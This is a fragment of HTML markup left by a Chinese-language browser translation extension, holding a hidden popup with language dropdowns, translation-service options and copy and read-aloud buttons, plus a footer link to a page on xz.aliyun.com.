<st-div id="__selection-translator__"> <st-div class="__st-box__" style="display: none; position: fixed; z-index: 99999; left: 0px; top: 0px; transform: translateX(581px) translateY(446px);"> <st-header> <st-span class="st-icon-pin" title="固定"></st-span> <st-span class="st-icon-down-open" title="展开"></st-span> <st-span class="st-icon-cog" title="设置"></st-span> </st-header> <st-div class="__query-form__" style="display: none;"> <st-div> <textarea placeholder="输入要翻译的句子或单词"></textarea> </st-div> <st-div> <select> <option value="">自动判断</option> <option value="zh">中文</option><option value="zh-CN">中文(简体)</option><option value="zh-HK">中文(香港)</option><option value="zh-TW">中文(繁体)</option><option value="en">英语</option><option value="ja">日语</option><option value="ko">朝鲜语</option><option value="de">德语</option><option value="fr">法语</option><option value="ru">俄语</option><option value="th">泰语</option><option value="af">南非语</option><option value="ar">阿拉伯语</option><option value="az">阿塞拜疆语</option><option value="be">比利时语</option><option value="bg">保加利亚语</option><option value="ca">加泰隆语</option><option value="cs">捷克语</option><option value="cy">威尔士语</option><option value="da">丹麦语</option><option value="dv">第维埃语</option><option value="el">希腊语</option><option value="eo">世界语</option><option value="es">西班牙语</option><option value="et">爱沙尼亚语</option><option value="eu">巴士克语</option><option value="fa">法斯语</option><option value="fi">芬兰语</option><option value="fo">法罗语</option><option value="gl">加里西亚语</option><option value="gu">古吉拉特语</option><option value="he">希伯来语</option><option value="hi">印地语</option><option value="hr">克罗地亚语</option><option value="hu">匈牙利语</option><option value="hy">亚美尼亚语</option><option value="id">印度尼西亚语</option><option value="is">冰岛语</option><option value="it">意大利语</option><option value="ka">格鲁吉亚语</option><option value="kk">哈萨克语</option><option value="kn">卡纳拉语</option><option value="kok">孔卡尼语</option><option value="ky">吉尔吉斯语</option><option value="lt">立陶宛语</option><option value="lv">拉脱维亚语</option><option value="mi">毛利语</option><option value="mk">马其顿语</option><option value="mn">蒙古语</option><option value="mr">马拉地语</option><option value="ms">马来语</option><option value="mt">马耳他语</option><option value="nb">挪威语(伯克梅尔)</option><option value="nl">荷兰语</option><option value="ns">北梭托语</option><option value="pa">旁遮普语</option><option value="pl">波兰语</option><option value="pt">葡萄牙语</option><option value="qu">克丘亚语</option><option value="ro">罗马尼亚语</option><option value="sa">梵文</option><option value="se">北萨摩斯语</option><option value="sk">斯洛伐克语</option><option value="sl">斯洛文尼亚语</option><option value="sq">阿尔巴尼亚语</option><option value="sv">瑞典语</option><option value="sw">斯瓦希里语</option><option value="syr">叙利亚语</option><option value="ta">泰米尔语</option><option value="te">泰卢固语</option><option value="tl">塔加路语</option><option value="tn">茨瓦纳语</option><option value="tr">土耳其语</option><option value="ts">宗加语</option><option value="tt">鞑靼语</option><option value="uk">乌克兰语</option><option value="ur">乌都语</option><option value="uz">乌兹别克语</option><option value="vi">越南语</option><option value="xh">班图语</option><option value="zu">祖鲁语</option> </select> <st-div class="__exchange__"> <st-span class="st-icon-exchange"></st-span> </st-div> <select> <option value="">自动选择</option> <option value="zh">中文</option><option value="zh-CN">中文(简体)</option><option value="zh-HK">中文(香港)</option><option value="zh-TW">中文(繁体)</option><option value="en">英语</option><option value="ja">日语</option><option value="ko">朝鲜语</option><option value="de">德语</option><option value="fr">法语</option><option value="ru">俄语</option><option value="th">泰语</option><option value="af">南非语</option><option value="ar">阿拉伯语</option><option value="az">阿塞拜疆语</option><option value="be">比利时语</option><option value="bg">保加利亚语</option><option value="ca">加泰隆语</option><option value="cs">捷克语</option><option value="cy">威尔士语</option><option value="da">丹麦语</option><option value="dv">第维埃语</option><option value="el">希腊语</option><option value="eo">世界语</option><option value="es">西班牙语</option><option value="et">爱沙尼亚语</option><option value="eu">巴士克语</option><option value="fa">法斯语</option><option value="fi">芬兰语</option><option value="fo">法罗语</option><option value="gl">加里西亚语</option><option value="gu">古吉拉特语</option><option value="he">希伯来语</option><option value="hi">印地语</option><option value="hr">克罗地亚语</option><option value="hu">匈牙利语</option><option value="hy">亚美尼亚语</option><option value="id">印度尼西亚语</option><option value="is">冰岛语</option><option value="it">意大利语</option><option value="ka">格鲁吉亚语</option><option value="kk">哈萨克语</option><option value="kn">卡纳拉语</option><option value="kok">孔卡尼语</option><option value="ky">吉尔吉斯语</option><option value="lt">立陶宛语</option><option value="lv">拉脱维亚语</option><option value="mi">毛利语</option><option value="mk">马其顿语</option><option value="mn">蒙古语</option><option value="mr">马拉地语</option><option value="ms">马来语</option><option value="mt">马耳他语</option><option value="nb">挪威语(伯克梅尔)</option><option value="nl">荷兰语</option><option value="ns">北梭托语</option><option value="pa">旁遮普语</option><option value="pl">波兰语</option><option value="pt">葡萄牙语</option><option value="qu">克丘亚语</option><option value="ro">罗马尼亚语</option><option value="sa">梵文</option><option value="se">北萨摩斯语</option><option value="sk">斯洛伐克语</option><option value="sl">斯洛文尼亚语</option><option value="sq">阿尔巴尼亚语</option><option value="sv">瑞典语</option><option value="sw">斯瓦希里语</option><option value="syr">叙利亚语</option><option value="ta">泰米尔语</option><option value="te">泰卢固语</option><option value="tl">塔加路语</option><option value="tn">茨瓦纳语</option><option value="tr">土耳其语</option><option value="ts">宗加语</option><option value="tt">鞑靼语</option><option value="uk">乌克兰语</option><option value="ur">乌都语</option><option value="uz">乌兹别克语</option><option value="vi">越南语</option><option value="xh">班图语</option><option value="zu">祖鲁语</option> </select> </st-div> <st-div> <select> <option value="YouDao">有道翻译</option> <option value="BaiDu">百度翻译</option> <option value="Google">谷歌翻译</option> <option value="GoogleCN">谷歌翻译（国内）</option> </select> <st-div class="__action-list__"> <st-div class="__button__ __btn-translate__">翻译 <st-span class="st-icon-down-dir"></st-span> </st-div> <st-div class="__expand__"> <st-div class="__button__">朗读</st-div> <st-div class="__button__">复制</st-div> </st-div> </st-div> </st-div> </st-div> <st-div class="__translate-result__" style="display: none;">正在查询，请稍候……</st-div> <st-div class="__translate-result__"> <st-div style="display: none;"> <st-span></st-span> <st-span class="__retry__">重试</st-span> </st-div> <st-div> <st-div class="__phonetic__"> <st-span style="display: none;"></st-span> <st-span class="__copy-and-read__"> <st-span>朗读</st-span> <st-span style="display: none;">复制</st-span> </st-span> </st-div> <st-div style="display: none;"> <st-ul>  </st-ul> <st-div class="__copy-and-read__"> <st-span class="__copy-and-read__">复制</st-span> </st-div> </st-div> <st-div style="display: none;">  <st-div class="__copy-and-read__"> <st-span class="__copy-and-read__">朗读</st-span> <st-span class="__copy-and-read__">复制</st-span> </st-div> </st-div> </st-div> </st-div> <st-footer> <st-span style="">via <a target="_blank" href="https://xz.aliyun.com/t/1961?from=groupmessage">谷歌翻译（国内）</a></st-span> </st-footer> </st-div> <st-div class="__st-btn__" style="display: none; position: fixed; z-index: 99999; left: 0px; top: 0px; transform: translateX(581px) translateY(446px);">译</st-div> </st-div></body></html>